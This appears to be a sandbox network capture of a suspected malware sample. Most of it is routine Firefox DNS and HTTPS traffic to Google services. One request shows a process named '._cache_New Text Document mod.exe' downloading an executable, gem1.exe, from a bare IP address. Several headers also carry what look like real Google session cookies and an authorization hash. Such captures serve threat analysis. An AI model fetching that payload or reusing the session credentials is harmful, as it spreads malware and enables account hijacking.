POST /batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Du165d8aakbdu%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: people-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain; charset=UTF-8
content-length: 835
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=cMDWyR80NQCYiVQb7fNJJiS4XwTHiQ331Yvv5tec4IZDivzWbDy4apTz82Ay4TKtrYx86woY6dS_rTaEaiqt3JEdzKgwqcUzh_9vb8Evc9r2nToT-adOxlehkUQzN0ZVoX2dtlH6lAKGbGEKWLTxXl6CKXb4ygyfqkKc2KGz5wppfs2lPdix5Rhk5_p2z0JP2n6xo2YIYgjR2UZ88cHW_glXDNeR6XKbLu1QAms3LRdgbpP1Ve5G0vzy-lNvgYuUoB5WbZrkTuhIMuB-odcKca4zeD0A8TbMzYr2zkiJ7rVrqsuG204l7--uyWEax7XCybNBdSBnYfbmSEbx7h1EJo03HZW5bU5_6SNxixGicO6wOrU0e4wmIBe28N0Z7-NpZlfNHwldBsOaRSwy8zTFVYEHnaFXRasBN6l-MQW6ov7odKbcu3f7LJpB7ZVMU77CNhNbbl32FlZLX0kbbotgXsl0uWjtdLJo8z2GNuZ8RJjqkG9A7kC_cJ794AKnWxGKZ_pLKQjhu0HSdNxsnVfXHP5Ci2UWSs6t6lnWFc_CrsPjS8f6SZsfiWKHQx80UQcQaUW0SdK8NqAhHEzBWZBzH6cIpz54_90hbchAXk76FLyxQ1CTSI6yD5HU4z3nWH6yM0iwJBu43DY-hQGKXrBZPocXrdIfWQQxUrMPON19wQEo2NZQtiAquaxlaw
cookie: __Secure-ENID=25.SE=bGHD7ePTNs8rZTaxzScGYDOzFY-8vmjSwMvbYNK3srcJFTNwxY-urv1PO9jRAR_YUSlfPMS2nRejdTZAR35VOXTLDiHqbOgoO0KJQgYo8hRFlLoZGtS937EStfTrof27WiIgwEKkfwo5IhGk0KEFsmbJrT-m9O6JQDc6aIavTpjqU3U0TTkdpMkvbxe5q3VUVo9wmLik
cookie: SID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZjwSscZdBJ4lF3uOBFp_ZAwACgYKAW8SARQSFQHGX2MiZFNJP2ACEFqZISPSalVAhBoVAUF8yKopDDVvR1akTCIG9iuBa6W50076
cookie: __Secure-1PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZWW_-Oe5-4MHRg_wLc5VbtQACgYKAfkSARQSFQHGX2Mim965HNRO_ngfVJcrEWufqxoVAUF8yKpfgx1Nhvk90r3zqVQTV6_W0076
cookie: __Secure-3PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZZBnZ1dT24jvpejQzPExglwACgYKAZYSARQSFQHGX2Mi0NitG6JVf_k0IBHjzhmNcRoVAUF8yKqJdc1HCm7tD_S31re8hOUj0076
cookie: HSID=ABKAK0UlryVQbQxXV
cookie: SSID=A8GJw4gkjpjsZ9u9k
cookie: APISID=Uu7hdbbPpx8uTKMQ/APW3YmgTxn9MOUw7z
cookie: SAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-1PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-3PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: SIDCC=AKEyXzWfEnQhCeDnUmGl4l8fbN9Ip4nxUhMLawj0L5SUSf5g_Hah2VEC4GE26nydrCfet6ih
cookie: __Secure-1PSIDCC=AKEyXzW6LVEr0tFgl8C1CBYWUI152qiUgdJSXzp5cZP01rla6KKR4idD8vYmwqBTcHCso0ma
cookie: __Secure-3PSIDCC=AKEyXzUrvxXKu271NJQic-68P4A3l7C6e_Fa0drmznZ-ziR0rI-dkD3AUU9RNQMHtdrS3L2U
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

people-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

people-pa.clients6.google.com

IN A

Response

people-pa.clients6.google.com

IN A

216.58.213.10
DNS

people-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

people-pa.clients6.google.com

IN AAAA

Response

people-pa.clients6.google.com

IN AAAA

2a00:1450:4009:826::200a
DNS

people-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

people-pa.clients6.google.com

IN AAAA

Response

people-pa.clients6.google.com

IN AAAA

2a00:1450:4009:826::200a
DNS

appsgrowthpromo-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

appsgrowthpromo-pa.clients6.google.com

IN A

Response

appsgrowthpromo-pa.clients6.google.com

IN A

216.58.201.106
DNS

appsgrowthpromo-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

appsgrowthpromo-pa.clients6.google.com

IN A

Response

appsgrowthpromo-pa.clients6.google.com

IN A

216.58.201.106
DNS

appsgrowthpromo-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

appsgrowthpromo-pa.clients6.google.com

IN A

Response

appsgrowthpromo-pa.clients6.google.com

IN A

142.250.179.234
DNS

appsgrowthpromo-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

appsgrowthpromo-pa.clients6.google.com

IN A

Response

appsgrowthpromo-pa.clients6.google.com

IN A

142.250.179.234
DNS

appsgrowthpromo-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

appsgrowthpromo-pa.clients6.google.com

IN AAAA

Response

appsgrowthpromo-pa.clients6.google.com

IN AAAA

2a00:1450:4009:81d::200a
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN A

Response

addons-pa.clients6.google.com

IN A

172.217.16.234
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN A

Response

addons-pa.clients6.google.com

IN A

142.250.200.42
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN A
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN AAAA

Response

addons-pa.clients6.google.com

IN AAAA

2a00:1450:4009:821::200a
DNS

addons-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

addons-pa.clients6.google.com

IN AAAA
OPTIONS

https://addons-pa.clients6.google.com/$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations

firefox.exe

Remote address:

142.250.200.42:443

Request

OPTIONS /$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations HTTP/2.0
host: addons-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-api-key,x-goog-authuser,x-user-agent
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
GET

http://66.63.187.250/zmk/gem1.exe

._cache_New Text Document mod.exe

Remote address:

66.63.187.250:80

Request

GET /zmk/gem1.exe HTTP/1.1
Host: 66.63.187.250

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:41:06 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 09 Jan 2025 17:20:31 GMT
ETag: "128e00-62b493200aa71"
Accept-Ranges: bytes
Content-Length: 1216000
Content-Type: application/x-msdownload
DNS

10.213.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

10.213.58.216.in-addr.arpa

IN PTR

Response

10.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f101e100net

10.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f10�H
DNS

10.213.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

10.213.58.216.in-addr.arpa

IN PTR

Response

10.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f101e100net

10.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f10�H
DNS

42.200.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

42.200.250.142.in-addr.arpa

IN PTR

Response

42.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f101e100net
DNS

42.200.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

42.200.250.142.in-addr.arpa

IN PTR

Response

42.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f101e100net
DNS

234.16.217.172.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

234.16.217.172.in-addr.arpa

IN PTR

Response

234.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f101e100net

234.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f10�I
DNS

234.16.217.172.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

234.16.217.172.in-addr.arpa

IN PTR

Response

234.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f101e100net

234.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f10�I
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN A

Response

youtube.googleapis.com

IN A

216.58.212.234

youtube.googleapis.com

IN A

216.58.201.106

youtube.googleapis.com

IN A

216.58.204.74

youtube.googleapis.com

IN A

172.217.16.234

youtube.googleapis.com

IN A

142.250.200.10

youtube.googleapis.com

IN A

142.250.178.10

youtube.googleapis.com

IN A

142.250.179.234

youtube.googleapis.com

IN A

142.250.187.202

youtube.googleapis.com

IN A

142.250.200.42

youtube.googleapis.com

IN A

142.250.180.10

youtube.googleapis.com

IN A

216.58.213.10

youtube.googleapis.com

IN A

172.217.169.74

youtube.googleapis.com

IN A

142.250.187.234

youtube.googleapis.com

IN A

216.58.212.202

youtube.googleapis.com

IN A

172.217.169.10

youtube.googleapis.com

IN A

172.217.169.42
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN A

Response

youtube.googleapis.com

IN A

142.250.200.10

youtube.googleapis.com

IN A

142.250.179.234

youtube.googleapis.com

IN A

172.217.169.74

youtube.googleapis.com

IN A

172.217.169.42

youtube.googleapis.com

IN A

142.250.187.234

youtube.googleapis.com

IN A

216.58.201.106

youtube.googleapis.com

IN A

216.58.213.10

youtube.googleapis.com

IN A

172.217.16.234

youtube.googleapis.com

IN A

142.250.200.42

youtube.googleapis.com

IN A

216.58.212.234

youtube.googleapis.com

IN A

142.250.187.202

youtube.googleapis.com

IN A

142.250.178.10

youtube.googleapis.com

IN A

142.250.180.10

youtube.googleapis.com

IN A

216.58.204.74
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN A

Response

youtube.googleapis.com

IN A

142.250.178.10

youtube.googleapis.com

IN A

142.250.187.234

youtube.googleapis.com

IN A

142.250.187.202

youtube.googleapis.com

IN A

216.58.204.74

youtube.googleapis.com

IN A

142.250.200.42

youtube.googleapis.com

IN A

216.58.201.106

youtube.googleapis.com

IN A

142.250.179.234

youtube.googleapis.com

IN A

172.217.169.42

youtube.googleapis.com

IN A

172.217.16.234

youtube.googleapis.com

IN A

216.58.213.10

youtube.googleapis.com

IN A

142.250.200.10

youtube.googleapis.com

IN A

172.217.169.74

youtube.googleapis.com

IN A

216.58.212.234

youtube.googleapis.com

IN A

142.250.180.10
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN A

Response

youtube.googleapis.com

IN A

172.217.16.234

youtube.googleapis.com

IN A

142.250.180.10

youtube.googleapis.com

IN A

142.250.200.10

youtube.googleapis.com

IN A

142.250.200.42

youtube.googleapis.com

IN A

142.250.179.234

youtube.googleapis.com

IN A

216.58.213.10

youtube.googleapis.com

IN A

216.58.212.234

youtube.googleapis.com

IN A

142.250.178.10

youtube.googleapis.com

IN A

172.217.169.74

youtube.googleapis.com

IN A

216.58.204.74

youtube.googleapis.com

IN A

216.58.201.106

youtube.googleapis.com

IN A

216.58.212.202

youtube.googleapis.com

IN A

172.217.169.42

youtube.googleapis.com

IN A

142.250.187.202

youtube.googleapis.com

IN A

172.217.169.10

youtube.googleapis.com

IN A

142.250.187.234
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN AAAA

Response

youtube.googleapis.com

IN AAAA

2a00:1450:4009:81d::200a

youtube.googleapis.com

IN AAAA

2a00:1450:4009:81e::200a

youtube.googleapis.com

IN AAAA

2a00:1450:4009:820::200a

youtube.googleapis.com

IN AAAA

2a00:1450:4009:81f::200a
DNS

youtube.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.googleapis.com

IN AAAA

Response

youtube.googleapis.com

IN AAAA

2a00:1450:4009:820::200a

youtube.googleapis.com

IN AAAA

2a00:1450:4009:81f::200a

youtube.googleapis.com

IN AAAA

2a00:1450:4009:81e::200a

youtube.googleapis.com

IN AAAA

2a00:1450:4009:81d::200a
DNS

234.212.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

234.212.58.216.in-addr.arpa

IN PTR

Response

234.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f2341e100net

234.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f10�J

234.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f10�J
DNS

234.212.58.216.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

234.212.58.216.in-addr.arpa

IN PTR

Response

234.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f101e100net

234.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f234�I

234.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f10�I
DNS

ogs.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogs.google.com

IN A

Response

ogs.google.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
DNS

ogs.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ogs.google.com

IN A

Response

ogs.google.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.180.14
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
GET

https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip

firefox.exe

Remote address:

142.250.180.14:443

Request

GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
host: redirector.gvt1.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
te: trailers
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.180.14
GET

http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

firefox.exe

Remote address:

88.221.134.155:80

Request

GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK

Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
ETag: 09372174e83dbbf696ee732fd2e875bb
Content-Length: 491284
Accept-Ranges: bytes
X-Timestamp: 1731033473.13891
Content-Type: application/zip
X-Trans-Id: txe2d6fd5524464f55a6fac-00673047f0dfw1
Cache-Control: public, max-age=219695
Expires: Thu, 16 Jan 2025 06:42:44 GMT
Date: Mon, 13 Jan 2025 17:41:09 GMT
Connection: keep-alive
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:81e::200e
DNS

contacts.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

contacts.google.com

IN A

Response

contacts.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b
DNS

signaler-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN A

Response

signaler-pa.clients6.google.com

IN A

142.250.200.42
DNS

signaler-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN A

Response

signaler-pa.clients6.google.com

IN A

142.250.179.234
POST

https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

firefox.exe

Remote address:

142.250.200.42:443

Request

POST /punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ HTTP/2.0
host: signaler-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json+protobuf
authorization: SAPISIDHASH 1736790067_d0899a763cac4d82c35ec4f7b38487759c8ca4ae
x-goog-authuser: 0
content-length: 59
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=cMDWyR80NQCYiVQb7fNJJiS4XwTHiQ331Yvv5tec4IZDivzWbDy4apTz82Ay4TKtrYx86woY6dS_rTaEaiqt3JEdzKgwqcUzh_9vb8Evc9r2nToT-adOxlehkUQzN0ZVoX2dtlH6lAKGbGEKWLTxXl6CKXb4ygyfqkKc2KGz5wppfs2lPdix5Rhk5_p2z0JP2n6xo2YIYgjR2UZ88cHW_glXDNeR6XKbLu1QAms3LRdgbpP1Ve5G0vzy-lNvgYuUoB5WbZrkTuhIMuB-odcKca4zeD0A8TbMzYr2zkiJ7rVrqsuG204l7--uyWEax7XCybNBdSBnYfbmSEbx7h1EJo03HZW5bU5_6SNxixGicO6wOrU0e4wmIBe28N0Z7-NpZlfNHwldBsOaRSwy8zTFVYEHnaFXRasBN6l-MQW6ov7odKbcu3f7LJpB7ZVMU77CNhNbbl32FlZLX0kbbotgXsl0uWjtdLJo8z2GNuZ8RJjqkG9A7kC_cJ794AKnWxGKZ_pLKQjhu0HSdNxsnVfXHP5Ci2UWSs6t6lnWFc_CrsPjS8f6SZsfiWKHQx80UQcQaUW0SdK8NqAhHEzBWZBzH6cIpz54_90hbchAXk76FLyxQ1CTSI6yD5HU4z3nWH6yM0iwJBu43DY-hQGKXrBZPocXrdIfWQQxUrMPON19wQEo2NZQtiAquaxlaw
cookie: __Secure-ENID=25.SE=bGHD7ePTNs8rZTaxzScGYDOzFY-8vmjSwMvbYNK3srcJFTNwxY-urv1PO9jRAR_YUSlfPMS2nRejdTZAR35VOXTLDiHqbOgoO0KJQgYo8hRFlLoZGtS937EStfTrof27WiIgwEKkfwo5IhGk0KEFsmbJrT-m9O6JQDc6aIavTpjqU3U0TTkdpMkvbxe5q3VUVo9wmLik
cookie: SID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZjwSscZdBJ4lF3uOBFp_ZAwACgYKAW8SARQSFQHGX2MiZFNJP2ACEFqZISPSalVAhBoVAUF8yKopDDVvR1akTCIG9iuBa6W50076
cookie: __Secure-1PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZWW_-Oe5-4MHRg_wLc5VbtQACgYKAfkSARQSFQHGX2Mim965HNRO_ngfVJcrEWufqxoVAUF8yKpfgx1Nhvk90r3zqVQTV6_W0076
cookie: __Secure-3PSID=g.a000sQhvJHvNOUR9Fk6co-HvLWQiU6xmYcXmUdaYt9igCg4DXdIZZBnZ1dT24jvpejQzPExglwACgYKAZYSARQSFQHGX2Mi0NitG6JVf_k0IBHjzhmNcRoVAUF8yKqJdc1HCm7tD_S31re8hOUj0076
cookie: HSID=ABKAK0UlryVQbQxXV
cookie: SSID=A8GJw4gkjpjsZ9u9k
cookie: APISID=Uu7hdbbPpx8uTKMQ/APW3YmgTxn9MOUw7z
cookie: SAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-1PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: __Secure-3PAPISID=NxrGjeoG6uh1tK2E/AbrPh4SJyDEmNzio_
cookie: SIDCC=AKEyXzUV30FzUuxVNGJHPxYtmG_axKOQmmPKIDIIxohGoyBpjJUAk5D9d717DldMsAZuAcrA
cookie: __Secure-1PSIDCC=AKEyXzXrSsC2tcwS_bZ9B--tLAw4buj5zOng1DzsKWUWc4TpA1_VBCREdsFbWdTbiUmDnwhc
cookie: __Secure-3PSIDCC=AKEyXzUrSBLOHc5xqHZd4jUvc0B7Q4Lg-XmCaqOJoxHIGo4jLneb-tw5tMxPsyXLumnJDJNZ
cookie: __Secure-1PSIDTS=sidts-CjIBmiPuTfTF_suPtC6-S1TfQeSK_ONtsnxBXTCdxeXe-M2FlgcLHnBLKjlD2Mtnk2R89BAA
cookie: __Secure-3PSIDTS=sidts-CjIBmiPuTfTF_suPtC6-S1TfQeSK_ONtsnxBXTCdxeXe-M2FlgcLHnBLKjlD2Mtnk2R89BAA
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

firefox.exe

Remote address:

142.250.200.42:443

Request

OPTIONS /punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ HTTP/2.0
host: signaler-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,content-type,x-goog-authuser
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://signaler-pa.clients6.google.com/punctual/multi-watch/channel?VER=8&gsessionid=iKs2tjZFiryrJNLyTQ-XUfNVbOVHhQyCKOF9Q6T_VzI&key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ&RID=66184&CVER=22&zx=x03fel5wyxcw&t=1

firefox.exe

Remote address:

142.250.200.42:443

Request

OPTIONS /punctual/multi-watch/channel?VER=8&gsessionid=iKs2tjZFiryrJNLyTQ-XUfNVbOVHhQyCKOF9Q6T_VzI&key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ&RID=66184&CVER=22&zx=x03fel5wyxcw&t=1 HTTP/2.0
host: signaler-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: authorization,x-goog-authuser,x-webchannel-content-type
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

signaler-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN A

Response

signaler-pa.clients6.google.com

IN A

142.250.178.10
DNS

signaler-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN A

Response

signaler-pa.clients6.google.com

IN A

142.250.178.10
DNS

r2---sn-5hnednss.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r2---sn-5hnednss.gvt1.com

IN A

Response

r2---sn-5hnednss.gvt1.com

IN CNAME

r2.sn-5hnednss.gvt1.com

r2.sn-5hnednss.gvt1.com

IN A

172.217.132.199
DNS

r2---sn-5hnednss.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r2---sn-5hnednss.gvt1.com

IN A

Response

r2---sn-5hnednss.gvt1.com

IN CNAME

r2.sn-5hnednss.gvt1.com

r2.sn-5hnednss.gvt1.com

IN A

172.217.132.199
DNS

signaler-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN AAAA

Response

signaler-pa.clients6.google.com

IN AAAA

2a00:1450:4009:80b::200a
DNS

signaler-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

signaler-pa.clients6.google.com

IN AAAA

Response

signaler-pa.clients6.google.com

IN AAAA

2a00:1450:4009:80b::200a
GET

https://r2---sn-5hnednss.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1736790069,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1736789390&mv=u&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com

firefox.exe

Remote address:

172.217.132.199:443

Request

GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1736790069,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1736789390&mv=u&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com HTTP/1.1
Host: r2---sn-5hnednss.gvt1.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Cache-Control: public,max-age=86400
Content-Disposition: attachment
Content-Length: 14485862
Content-Security-Policy: default-src 'none'
Content-Type: application/zip
Etag: "1d3918c"
Server: downloads
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
